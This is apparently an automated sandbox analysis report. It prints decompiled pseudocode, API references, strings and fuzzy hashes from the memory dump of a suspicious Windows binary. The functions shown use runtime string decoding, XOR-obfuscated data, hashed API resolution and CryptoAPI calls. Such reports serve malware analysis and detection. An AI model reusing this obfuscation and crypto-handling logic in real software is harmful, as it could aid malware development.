				if( *((intOrPtr*)(_t154 + 0x3c)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x40)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x44)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x48)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x4c)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x50)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x54)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x58)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x5c)));
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
				}
				if( *((intOrPtr*)(_t154 + 0x60)) != 0) {
					_v128 = 0x10d102ce;
					_v124 = 0x76a9bb5b;
					_v120 = 0xcdedd456;
					_v116 = 0x812bf5d3;
					_v112 = 0xb1ffb6d2;
					_v108 = 0xb1ffb6c6;
					_v104 = 0x98c91775;
					_v100 = 0xaa41a57f;
					_v96 = 0xfde63911;
					_v92 = 0xa2a0b704;
					_v88 = 0x9ec5d5c6;
					_a4 = E00407563( &_v128);
					E00405C38( &_v28, 0x42); // executed
					_t99 = E00405C7D( &_v28, 0x40);
					_v12 = _t99;
					if( *((intOrPtr*)(_t154 + 0x6c)) == 0) {
						wsprintfW(_t99, _a4);
					} else {
						wsprintfW(_t99, L"%x%x",  *((intOrPtr*)(_t154 + 0x6c)),  *((intOrPtr*)(_t154 + 0x70)));
						_t156 = _t156 + 0x10;
					}
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x64)));
					E00401A92(_t155, _t143);
					E00401A92(_t155, _v12);
					E00401A92(_t155, _v8);
					_t156 = _t156 + 0x20;
					E00405C6C( &_v28);
				}
				if( *((intOrPtr*)(_t154 + 0x74)) != 0) {
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x78)));
					E00401A92(_t155, _t143);
					E00401A92(_t155,  *((intOrPtr*)(_t154 + 0x7c)));
					E00401A92(_t155, _v8);
				}
				 *((short*)(_t155 + lstrlenW(_t155) * 2 - 2)) = 0;
				return _t155;
			}

0x00409706
0x0040970e
0x00409710
0x00409717
0x0040971e
0x00409725
0x0040972c
0x00409733
0x0040973f
0x00409741
0x0040974b
0x00409753
0x0040975a
0x00409761
0x00409768
0x0040976f
0x00409776
0x00409782
0x00409787
0x0040978a
0x00409793
0x0040979a
0x004097a6
0x004097af
0x004097b4
0x004097b4
0x004097ba
0x004097c0
0x004097c7
0x004097d0
0x004097d9
0x004097de
0x004097de
0x004097e5
0x004097eb
0x004097f2
0x004097fb
0x00409804
0x00409809
0x00409809
0x00409810
0x00409816
0x0040981d
0x00409826
0x0040982f
0x00409834
0x00409834
0x0040983b
0x00409841
0x00409848
0x00409851
0x0040985a
0x0040985f
0x0040985f
0x00409866
0x0040986c
0x00409873
0x0040987c
0x00409885
0x0040988a
0x0040988a
0x00409891
0x00409897
0x0040989e
0x004098a7
0x004098b0
0x004098b5
0x004098b5
0x004098bc
0x004098c2
0x004098c9
0x004098d2
0x004098db
0x004098e0
0x004098e0
0x004098e7
0x004098ed
0x004098f4
0x004098fd
0x00409906
0x0040990b
0x0040990b
0x00409912
0x0040991b
0x00409923
0x0040992a
0x00409931
0x00409938
0x0040993f
0x00409946
0x0040994d
0x00409954
0x0040995b
0x00409962
0x00409974
0x00409977
0x00409981
0x0040998a
0x0040998d
0x004099aa
0x0040998f
0x0040999b
0x004099a1
0x004099a1
0x004099b6
0x004099bd
0x004099c6
0x004099cf
0x004099d4
0x004099da
0x004099da
0x004099e3
0x004099e9
0x004099f0
0x004099f9
0x00409a02
0x00409a07
0x00409a14
0x00409a20

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00409A0B

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

wsprintfW.USER32 ref: 0040999B
wsprintfW.USER32 ref: 004099AA

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Strings

%x%x, xrefs: 00409995

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtualwsprintf$AllocFreelstrlen
String ID: %x%x
API String ID: 1269146923-1516736529
Opcode ID: f75b9631595efc11da2d36527969a36c0edc999a0426c28597894353872bd736
Instruction ID: 1b52df81136ed31761314ed8c424165e3dcf5c5b7b94863be6299ce940a75ed4
Opcode Fuzzy Hash: f75b9631595efc11da2d36527969a36c0edc999a0426c28597894353872bd736
Instruction Fuzzy Hash: C2918A71902629BADB12AFE18C41BEEB679BF15304F40C02BF104355A1E73D5AA1DF9D

Uniqueness

Uniqueness Score: 100.00%

Function 00408CDE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00408CDE(intOrPtr _a4, intOrPtr _a8) {
				short _v68;
				signed int _t12;
				WCHAR* _t13;
				void* _t19;
				WCHAR* _t20;
				WCHAR* _t23;
				signed int _t24;
				WCHAR* _t29;
				signed int _t30;
				signed int _t33;
				short _t35;
				WCHAR* _t37;
				WCHAR* _t42;
				short _t43;
				short _t45;
				void* _t46;
				void* _t47;

				_t45 = 0;
				while(1) {
					_t12 = E0040C03D(0, _a4, _a8); // executed
					_t33 = _t12;
					_t13 = E0040C6BA(8 + _t33 * 2); // executed
					_t47 = _t46 + 0xc;
					 *0x4198a0 = _t13;
					_t49 = _t13;
					if(_t13 == 0) {
						break;
					}
					_t35 = 0x2e;
					 *_t13 = _t35;
					 *0x4198a0 =  &(( *0x4198a0)[1]);
					E0040C70B( &_v68, 0, 0x40);
					wsprintfW( &_v68,  &M00411900, _t33);
					_t19 = E0040C1AC(_t49,  *0x4198a0, _t33); // executed
					_t46 = _t47 + 0x20;
					_t20 =  *0x4198a0; // 0x6590000
					if(_t19 == 0) {
						_t21 = _t20 - 2;
						 *0x4198a0 = _t20 - 2;
						E0040C6D1(_t21);
						 *0x4198a0 =  *0x4198a0 & 0x00000000;
						__eflags =  *0x4198a0;
						break;
					}
					_t23 = _t20 - 2;
					 *0x4198a0 = _t23;
					_t24 = lstrlenW(_t23);
					_t37 =  *0x4198a0; // 0x6590000
					_t43 = 0x20;
					_t37[_t24] = _t43;
					if(E00408277(_t43,  *0x4198a0) != 0 || E004083AD( *0x4198a0) != 0 || E0040831E( *0x4198a0) != 0) {
						E0040C6D1( *0x4198a0);
						 *0x4198a0 =  *0x4198a0 & 0x00000000;
						_t45 = _t45 + 1;
						if(_t45 < 0xa) {
							continue;
						}
						break;
					} else {
						_t29 =  *0x4198a0; // 0x6590000
						__eflags = _t29;
						if(_t29 == 0) {
							break;
						}
						_t30 = lstrlenW(_t29);
						_t42 =  *0x4198a0; // 0x6590000
						 *((short*)(_t42 + _t30 * 2 - 2)) = 0;
						return 1;
					}
				}
				return 0;
			}

0x00408ce6
0x00408ce8
0x00408cee
0x00408cf3
0x00408cfd
0x00408d02
0x00408d05
0x00408d0a
0x00408d0c
0x00000000
0x00000000
0x00408d14
0x00408d15
0x00408d1b
0x00408d27
0x00408d36
0x00408d43
0x00408d48
0x00408d4d
0x00408d52
0x00408de5
0x00408de9
0x00408dee
0x00408df3
0x00408df3
0x00000000
0x00408dfa
0x00408d58
0x00408d5c
0x00408d61
0x00408d67
0x00408d6f
0x00408d70
0x00408d82
0x00408daa
0x00408daf
0x00408db6
0x00408dbb
0x00000000
0x00000000
0x00000000
0x00408dc3
0x00408dc3
0x00408dc8
0x00408dca
0x00000000
0x00000000
0x00408dcd
0x00408dd3
0x00408ddb
0x00000000
0x00408de2
0x00408d82
0x00000000

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 00408D36

Part of subcall function 0040C1AC: GetModuleHandleA.KERNEL32(?,00000000,00000001,?,00000000,00000000), ref: 0040C271
Part of subcall function 0040C1AC: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0040C27F
Part of subcall function 0040C1AC: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll,?,00000000,00000000), ref: 0040C28E

lstrlenW.KERNEL32(0658FFFE), ref: 00408D61

Part of subcall function 00408277: lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,?,?,00408106), ref: 004082B3
Part of subcall function 00408277: VirtualAlloc.KERNELBASE(00000000,00000000,?,?,00408106), ref: 004082C3
Part of subcall function 00408277: wsprintfW.USER32 ref: 004082D7
Part of subcall function 00408277: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040830F

Part of subcall function 0040831E: lstrlenW.KERNEL32(00000000,00003000,00000004,00000010,00000000,00000000,00000010,?,00408131,00000010), ref: 00408357
Part of subcall function 0040831E: VirtualAlloc.KERNELBASE(00000000,00000000,?,00408131,00000010), ref: 00408367
Part of subcall function 0040831E: wsprintfW.USER32 ref: 0040837A
Part of subcall function 0040831E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0040839E

lstrlenW.KERNEL32(06590000), ref: 00408DCD

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

0x%X, xrefs: 00408D30

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$lstrlen$AllocFreewsprintf$AddressHandleLibraryLoadModuleProc
String ID: 0x%X
API String ID: 2969386597-114169716
Opcode ID: de895cadfd356ef8c328ef40254f92d3b7a2b71a12a53a8f4f555422e978aff3
Instruction ID: b1fca2875ea0cfa30d674e8bc7323fff4106cbb2d137bff61fbe959751f1b288
Opcode Fuzzy Hash: de895cadfd356ef8c328ef40254f92d3b7a2b71a12a53a8f4f555422e978aff3
Instruction Fuzzy Hash: 5931AE72620201AFD710BF69ED55A9637A9BF16358B50863FE548E61F1EF3A8C12C60C

Uniqueness

Uniqueness Score: 100.00%

Function 00401D43, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 128
memoryUNIQUE

Download Yara Rule

C-Code - Quality: 98%

			E00401D43() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				char _v196;
				char _v197;
				char _v204;
				char _v205;
				char _v236;
				char _v300;
				void* _t70;
				void* _t84;
				signed int _t91;
				signed int _t92;
				void* _t93;
				void* _t95;
				void* _t97;

				E00407581(0x413b38, 0x10, 0x413b48, 0x114);
				_t70 = 0;
				do {
					 *(_t70 + 0x413b48) =  *(_t70 + 0x413b48) ^ 0x00000005;
					_t70 = _t70 + 1;
				} while (_t70 < 0x114);
				_v196 = 0x61d2503f;
				_v192 = 0x6115be4e;
				_v188 = 0xaf7b65bc;
				_v184 = 0x989a257e;
				_v180 = 0x9204b627;
				_v176 = 0x9204b64b;
				_v172 = 0x6fc8b285;
				_v168 = 0x1e26fc6a;
				_v164 = 0xbceaa511;
				_v160 = 0x7cde56a8;
				_v156 = 0x134a1032;
				_v152 = 0xaf1af3c4;
				_v148 = 0x8e345341;
				_v144 = 0x76846e52;
				_v140 = 0x22c22435;
				_v136 = 0xac5b5bd2;
				_v132 = 0xb22e5817;
				_v128 = 0x46050050;
				_v124 = 0x2439dbc8;
				_v120 = 0x6b13fa6b;
				_v116 = 0x44303979;
				_v112 = 0x47511e34;
				_v108 = 0xfc881dbd;
				_v104 = 0x6636007c;
				_v100 = 0x171aaccb;
				_v96 = 0xedfbc094;
				_v92 = 0x868c995f;
				_v88 = 0x780cbc19;
				_v84 = 0x4eeb621a;
				_v80 = 0x16acf906;
				_v76 = 0xfe672d32;
				_v72 = 0xeacf3f26;
				_v68 = 0xef0fbbba;
				_t95 = E00407563( &_v196);
				_v64 = 0x5afc1d2e;
				_v60 = 0x3b111966;
				_v56 = 0xf4b718a1;
				_v52 = 0x2b4c83e2;
				_v48 = 0x40854db3;
				_v44 = 0x40854d97;
				_v40 = 0x2a246d9b;
				_v36 = 0x2ddf958a;
				_v32 = 0xe806d36b;
				_v28 = 0xe812a210;
				_v24 = 0x4cd66fc;
				_v20 = 0x16384767;
				_v16 = 0x99ed2ca1;
				_v12 = 0x6bf483e5;
				_v8 = 0x3281e183;
				_t93 = E00407563( &_v64);
				_t92 = 0;
				do {
					 *((char*)(_t97 + _t92 - 0xe8)) =  *((intOrPtr*)(_t95 + _t92 * 2));
					_t92 = _t92 + 1;
				} while (_t92 < 0x1f);
				_v205 = 0;
				_t91 = 0;
				do {
					 *((char*)(_t97 + _t91 - 0xc8)) =  *((intOrPtr*)(_t93 + _t91 * 2));
					_t91 = _t91 + 1;
				} while (_t91 < 7);
				_v197 = 0;
				E0040C437( &_v300, 0x40);
				_push(0x40);
				E00407C9C( &_v300,  &_v236, 0x100);
				E00407C7E( &_v300,  &_v204);
				_t84 = VirtualAlloc(0, 0x114, 0x3000, 4); // executed
				 *0x419890 = _t84;
				return E00407BCF( &_v300, 0x413b48, _t84, 0x114);
			}

0x00401d61
0x00401d6b
0x00401d6d
0x00401d6d
0x00401d74
0x00401d75
0x00401d7f
0x00401d8a
0x00401d94
0x00401d9e
0x00401da8
0x00401db2
0x00401dbc
0x00401dc6
0x00401dd0
0x00401dda
0x00401de4
0x00401dee
0x00401df8
0x00401e02
0x00401e0c
0x00401e16
0x00401e20
0x00401e27
0x00401e2e
0x00401e35
0x00401e3c
0x00401e43
0x00401e4a
0x00401e51
0x00401e58
0x00401e5f
0x00401e66
0x00401e6d
0x00401e74
0x00401e7b
0x00401e82
0x00401e89
0x00401e90
0x00401e9c
0x00401e9e
0x00401ea8
0x00401eb0
0x00401eb7
0x00401ebe
0x00401ec5
0x00401ecc
0x00401ed3
0x00401eda
0x00401ee1
0x00401ee8
0x00401eef
0x00401ef6
0x00401efd
0x00401f04
0x00401f12
0x00401f14
0x00401f16
0x00401f19
0x00401f20
0x00401f21
0x00401f26
0x00401f2c
0x00401f2e
0x00401f31
0x00401f38
0x00401f39
0x00401f44
0x00401f4d
0x00401f52
0x00401f67
0x00401f7a
0x00401f90
0x00401f98
0x00401fb7

APIs

VirtualAlloc.KERNELBASE(00000000,00000114,00003000,00000004), ref: 00401F90

Strings

P, xrefs: 00401E27
y90D, xrefs: 00401E3C
|, xrefs: 00401E51

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: P$y90D$|
API String ID: 4275171209-2752100050
Opcode ID: 29446a0b790253e8ef330300d614210e5b24e5cc47c14b21cdf5d7547a89c4e7
Instruction ID: 03566cb555129bb31b99a51b26fbd84f63b8e4e238171f94d7695d77e582a917
Opcode Fuzzy Hash: 29446a0b790253e8ef330300d614210e5b24e5cc47c14b21cdf5d7547a89c4e7
Instruction Fuzzy Hash: 305176B0D05328AADB20DF968D81BCEBF74BB05300F6081ADE159BB246DB745A85CF59

Uniqueness

Uniqueness Score: 100.00%

Function 0040799B, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
UNIQUE

Download Yara Rule

C-Code - Quality: 17%

			E0040799B(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				char _t31;
				char _t47;
				intOrPtr* _t55;
				intOrPtr* _t56;

				EnterCriticalSection(0x41982c);
				_t31 = 0;
				_v12 = 0;
				_v8 = 0;
				_t18 = E004010BB(0, 5, 0x8ad7de22);
				_t19 =  *_t18( &_v12, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t19 != 0) {
					_t47 = 0;
					_t21 = E004010BB(0, 5, 0x78660dbe);
					_push( &_v8);
					_push(0);
					_push(0);
					_push(_a8);
					_push(_a4);
					_push(_v12);
					if( *_t21() != 0) {
						_v16 = 0xa;
						_t26 = E004010BB(0, 5, 0x37a53119);
						 *_t26(_v8, 8,  &_v20,  &_v16, 0);
						_t55 = _a16;
						 *_t55 = 0xc8;
						_t28 = E004010BB(0, 5, 0xcebf13be);
						_t47 =  *_t28(_v8, 0, 1, 0, _a12, _t55, _a20);
						GetLastError();
					}
					E00407983(_v8);
					 *_t56 = 0x72760bb8;
					_t24 = E004010BB(_t31);
					 *_t24(_v12, _t31, 5);
					_t31 = _t47;
				}
				LeaveCriticalSection(0x41982c);
				return _t31;
			}

0x004079a7
0x004079ad
0x004079b6
0x004079b9
0x004079bc
0x004079d4
0x004079d8
0x004079ea
0x004079ec
0x004079f6
0x004079f7
0x004079f8
0x004079f9
0x004079fc
0x004079ff
0x00407a04
0x00407a10
0x00407a17
0x00407a2a
0x00407a2c
0x00407a39
0x00407a3f
0x00407a54
0x00407a56
0x00407a56
0x00407a5f
0x00407a67
0x00407a70
0x00407a79
0x00407a7b
0x00407a7e
0x00407a84
0x00407a90

APIs

EnterCriticalSection.KERNEL32(0041982C,?,00000000,?,00000000,00000100,?,?,?,?,00000000,00000000), ref: 004079A7

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetLastError.KERNEL32 ref: 00407A56
LeaveCriticalSection.KERNEL32(0041982C,?,?,?,?,00000000,00000000), ref: 00407A84

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 004079CA

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CriticalSection$EnterErrorLastLeaveLibraryLoad
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2909639778-1948191093
Opcode ID: f95b2f6de8680b44a698c25795010bcf0cf3e4e4056fd6323f3733fd3985ae85
Instruction ID: 5adf146a80589cceab82e21b79ccb5e53421ebd35dad1ae6ed96e32bca400bce
Opcode Fuzzy Hash: f95b2f6de8680b44a698c25795010bcf0cf3e4e4056fd6323f3733fd3985ae85
Instruction Fuzzy Hash: 45219372904208BFEB04AFD49C46FEF7768EB04754F10016AFA44761C0DE756E408B69

Uniqueness

Uniqueness Score: 100.00%

Function 00425A57, Relevance: 6.1, APIs: 4, Instructions: 78libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1), ref: 00425A95
GetLastError.KERNEL32(?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1,00000006,00438F54,0043E5F8), ref: 00425AA1
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00425AD7
FreeLibrary.KERNEL32(00000000,?,00000000,?,0044B6B4,?,00425B62,?,?,00000000,?,?,?,00425DB1,00000006,00438F54), ref: 00425AFD

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Library$Load$ErrorFreeLast
String ID:
API String ID: 3813093105-0
Opcode ID: f4b64f67717c447c1903e6e61ddd7bee166b4557a0e9dd52f0255bc216a1b7d8
Instruction ID: e78ec2a52412fc58c9f64a7e788c4a5cd4fcb0124779d8123792873f8b3d94f0
Opcode Fuzzy Hash: f4b64f67717c447c1903e6e61ddd7bee166b4557a0e9dd52f0255bc216a1b7d8
Instruction Fuzzy Hash: 5121F332B45A30ABCF318A25ACC5B1B7B589B11760FA40222FC05A7390D638ED01C5E9

Uniqueness

Uniqueness Score: 0.04%

Function 0040C790, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040C790(void* __ebx, void* __edx, signed int __ebp, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v0;
				intOrPtr _v12;
				signed int _v16;
				signed int _v28;
				signed int _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr* _v52;
				char _v72;
				signed int _v76;
				signed int _v88;
				signed int _v92;
				char _v120;
				signed int _v124;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v176;
				void* __edi;
				void* __esi;
				signed int _t163;
				signed int _t168;
				signed int _t173;
				intOrPtr _t178;
				intOrPtr _t190;
				intOrPtr* _t197;
				signed int _t198;
				intOrPtr _t199;
				signed int _t204;
				void* _t206;
				void* _t210;
				void* _t214;
				signed int _t218;
				signed char _t229;
				signed int _t230;
				signed int _t236;
				signed int _t240;
				signed int _t243;
				signed int _t244;
				signed int _t253;
				void* _t257;
				signed int _t264;
				signed int _t268;
				signed int _t278;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t292;
				void* _t296;
				signed int _t307;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				void* _t324;
				intOrPtr* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t328;
				signed int _t329;
				intOrPtr* _t330;
				signed int _t336;
				signed int _t338;
				signed int _t349;
				signed int _t351;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed char _t364;
				signed char _t366;
				char* _t369;
				signed char* _t372;
				intOrPtr _t375;
				intOrPtr _t376;
				signed int _t380;
				signed int _t383;
				signed int _t385;
				intOrPtr _t387;
				signed int _t392;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				intOrPtr* _t399;
				signed int _t403;
				intOrPtr _t413;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed char* _t438;
				char* _t440;
				signed int _t471;
				signed int _t472;
				intOrPtr _t473;
				signed int _t474;
				intOrPtr _t485;
				void* _t490;

				_t471 = __ebp;
				_t394 = __edx;
				_t324 = __ebx;
				_t163 = _a4;
				if(_t163 != 0) {
					__eflags = _t163 - 0x1fffffff;
					if(__eflags > 0) {
						E00415C7B(__edx, __eflags);
						goto L10;
					} else {
						_t320 = _t163 << 3;
						__eflags = _t320 - 0x1000;
						if(__eflags < 0) {
							_t163 = E0041500C(__edx, __eflags, _t320); // executed
							_t490 = _t490 + 4;
							__eflags = _t163;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t361 = _t320 + 0x23;
							__eflags = _t361 - _t320;
							if(__eflags <= 0) {
								L10:
								E00415C7B(_t394, __eflags);
								goto L11;
							} else {
								_t361 = E0041500C(__edx, __eflags, _t361);
								_t490 = _t490 + 4;
								__eflags = _t361;
								if(__eflags == 0) {
									L11:
									E0041A825(_t324, _t361, _t394, __eflags);
									L12:
									E0041A825(_t324, _t361, _t394, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t168 = _a4;
									__eflags = _t168;
									if(_t168 != 0) {
										__eflags = _t168 - 0x3fffffff;
										if(__eflags > 0) {
											E00415C7B(_t394, __eflags);
											goto L23;
										} else {
											_t316 = _t168 << 2;
											__eflags = _t316 - 0x1000;
											if(__eflags < 0) {
												_t168 = E0041500C(_t394, __eflags, _t316);
												_t490 = _t490 + 4;
												__eflags = _t168;
												if(__eflags != 0) {
													goto L14;
												} else {
													goto L25;
												}
											} else {
												_t361 = _t316 + 0x23;
												__eflags = _t361 - _t316;
												if(__eflags <= 0) {
													L23:
													E00415C7B(_t394, __eflags);
													goto L24;
												} else {
													_t317 = E0041500C(_t394, __eflags, _t361); // executed
													_t361 = _t317;
													_t490 = _t490 + 4;
													__eflags = _t361;
													if(__eflags == 0) {
														L24:
														E0041A825(_t324, _t361, _t394, __eflags);
														L25:
														E0041A825(_t324, _t361, _t394, __eflags);
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														asm("int3");
														_t173 = _a4;
														__eflags = _t173;
														if(_t173 != 0) {
															__eflags = _t173 - 0x15555555;
															if(__eflags > 0) {
																E00415C7B(_t394, __eflags);
																goto L36;
															} else {
																_t312 = _t173 + _t173 * 2 << 2;
																__eflags = _t312 - 0x1000;
																if(__eflags < 0) {
																	_t173 = E0041500C(_t394, __eflags, _t312);
																	_t490 = _t490 + 4;
																	__eflags = _t173;
																	if(__eflags != 0) {
																		goto L27;
																	} else {
																		goto L38;
																	}
																} else {
																	_t361 = _t312 + 0x23;
																	__eflags = _t361 - _t312;
																	if(__eflags <= 0) {
																		L36:
																		E00415C7B(_t394, __eflags);
																		goto L37;
																	} else {
																		_t361 = E0041500C(_t394, __eflags, _t361);
																		_t490 = _t490 + 4;
																		__eflags = _t361;
																		if(__eflags == 0) {
																			L37:
																			E0041A825(_t324, _t361, _t394, __eflags);
																			L38:
																			E0041A825(_t324, _t361, _t394, __eflags);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_t395 = _a8;
																			_push(_t324);
																			_t325 = _a4;
																			_t432 = _t361;
																			_t178 =  *((intOrPtr*)(_t325 + 0x10));
																			__eflags = _t178 - _t395;
																			if(__eflags < 0) {
																				_push("invalid string position");
																				E0041371B(_t325, _t396, __eflags);
																				goto L61;
																			} else {
																				_t361 =  *(_t432 + 0x10);
																				_t296 = _t178 - _t395;
																				_push(_t471);
																				_t485 = _a12;
																				__eflags = _t485 - _t296;
																				_t471 =  >  ? _t296 : _t485;
																				__eflags =  !_t361 - _t471;
																				if(__eflags <= 0) {
																					L61:
																					_push("string too long");
																					E004136FB(_t325, _t396, __eflags);
																					goto L62;
																				} else {
																					_push(_t396);
																					_t396 = _t361 + _t471;
																					__eflags = _t471;
																					if(_t471 == 0) {
																						L59:
																						return _t432;
																					} else {
																						__eflags = _t396 - 0xfffffffe;
																						if(__eflags > 0) {
																							L62:
																							_push("string too long");
																							E004136FB(_t325, _t396, __eflags);
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							_push(_t325);
																							_t326 = _v16;
																							_push(_t432);
																							_t433 = _t361;
																							_t362 =  *(_t433 + 0x10);
																							__eflags =  !_t362 - _t326;
																							if(__eflags <= 0) {
																								_push("string too long");
																								E004136FB(_t326, _t396, __eflags);
																								goto L77;
																							} else {
																								_push(_t396);
																								_t396 = _t362 + _t326;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									L75:
																									return _t433;
																								} else {
																									__eflags = _t396 - 0xfffffffe;
																									if(__eflags > 0) {
																										L77:
																										_push("string too long");
																										E004136FB(_t326, _t396, __eflags);
																										asm("int3");
																										_push(_t326);
																										_t327 = _v32;
																										_push(_t433);
